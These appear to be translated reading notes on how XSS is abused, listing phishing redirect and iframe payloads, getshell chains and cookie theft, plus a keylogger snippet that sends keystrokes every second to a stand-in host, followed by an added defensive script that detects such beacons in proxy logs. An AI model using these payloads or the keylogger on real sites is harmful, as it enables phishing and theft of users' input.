XSS can execute arbitrary JS code on the client.
0x01 How XSS is used
1. Phishing. Case: http://www.wooyun.org/bugs/wooyun-2014-076685 ("How I used an XSS to probe the Sohu intranet, scan the intranet, and worm through to the front end")
2. Phishing with a forged operation interface
Direct redirect
<script>document.location.href = "http://test.com/xxx.htm";</script>
IFRAME phishing
<iframe src="http://test.com/11.htm" height="100%" width="100%"></iframe>
Flash phishing
http://www.wooyun.org/bugs/wooyun-2010-02532
3. Pop-up ads and traffic inflation
4. Arbitrary POST/GET operations
For example, a stored XSS in the DZ admin backend can obtain the UC key or a webshell. Case:
http://www.wooyun.org/bugs/wooyun-2010-045716
In DedeCMS, a stored XSS combined with the backend file manager can get a shell
Case: DedeCMS getshell using XSS + CSRF
http://huakai.paxmac.org/?p=587
WordPress: stored XSS combined with templates to get a shell
5. HTML5 can also
6. Stealing cookies
Blind XSS
7. XSS keylogger
{ get = window.event ? event : e;
key = get.keyCode ? get.keyCode : get.charCode;
key = String.fromCharCode(key);
keys += key; }
window.setInterval(function () {
new Image().src = 'http://yourhost.com/g.php?c=' + keys;
keys = '';
}, 1000);
8. Spying on client information
Scanning the intranet
Automatically submitting St2 vulnerabilities (case listed in Heige's PPT)
IP address
10. DDoS
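
A defender's view of item 7, as an added example that is not part of the original notes: the snippet's timer fires an image request every 1000 ms whether or not keys were typed, so in proxy logs it appears as a fixed-cadence beacon to one endpoint with a single query parameter. The log format, host names and thresholds below are assumptions constructed for illustration, and the check is a heuristic, not a complete detector.

```javascript
// Constructed proxy log lines (not from the page): "<ISO time> <client> <method> <url>"
const SAMPLE_LOG = [
  "2024-01-01T10:00:00.000Z 10.0.0.5 GET http://collector.example/g.php?c=pa",
  "2024-01-01T10:00:01.010Z 10.0.0.5 GET http://collector.example/g.php?c=ss",
  "2024-01-01T10:00:01.500Z 10.0.0.5 GET http://cdn.example/logo.png",
  "2024-01-01T10:00:02.005Z 10.0.0.5 GET http://collector.example/g.php?c=",
  "2024-01-01T10:00:03.020Z 10.0.0.5 GET http://collector.example/g.php?c=wo",
  "2024-01-01T10:00:04.000Z 10.0.0.5 GET http://collector.example/g.php?c=rd",
  "2024-01-01T10:00:04.100Z 10.0.0.7 GET http://news.example/?page=1",
  "2024-01-01T10:00:30.000Z 10.0.0.7 GET http://news.example/?page=2",
];

function median(nums) {
  const s = [...nums].sort((a, b) => a - b);
  const mid = Math.floor(s.length / 2);
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Flag client/endpoint pairs requested at a steady cadence with one query parameter.
function findBeacons(lines, { minHits = 5, maxJitter = 0.2 } = {}) {
  const groups = new Map();
  for (const line of lines) {
    const [ts, client, method, rawUrl] = line.trim().split(/\s+/);
    let url;
    try { url = new URL(rawUrl); } catch { continue; } // skip malformed entries
    const t = Date.parse(ts);
    if (Number.isNaN(t) || method !== "GET") continue;
    if ([...url.searchParams.keys()].length !== 1) continue;
    const key = `${client} ${url.origin}${url.pathname}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(t);
  }
  const hits = [];
  for (const [key, times] of groups) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const med = median(gaps);
    // Every gap must sit within maxJitter of the median to count as a timer.
    const steady = med > 0 && gaps.every(g => Math.abs(g - med) <= med * maxJitter);
    if (!steady) continue;
    const [client, endpoint] = key.split(" ");
    hits.push({ client, endpoint, count: times.length, medianMs: med });
  }
  return hits;
}

console.log(findBeacons(SAMPLE_LOG));
```

A hit is a lead for review of the page that issued the requests; legitimate analytics or polling endpoints can produce the same cadence.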
XSS Cross-site scripting attacks and defense reading notes (original)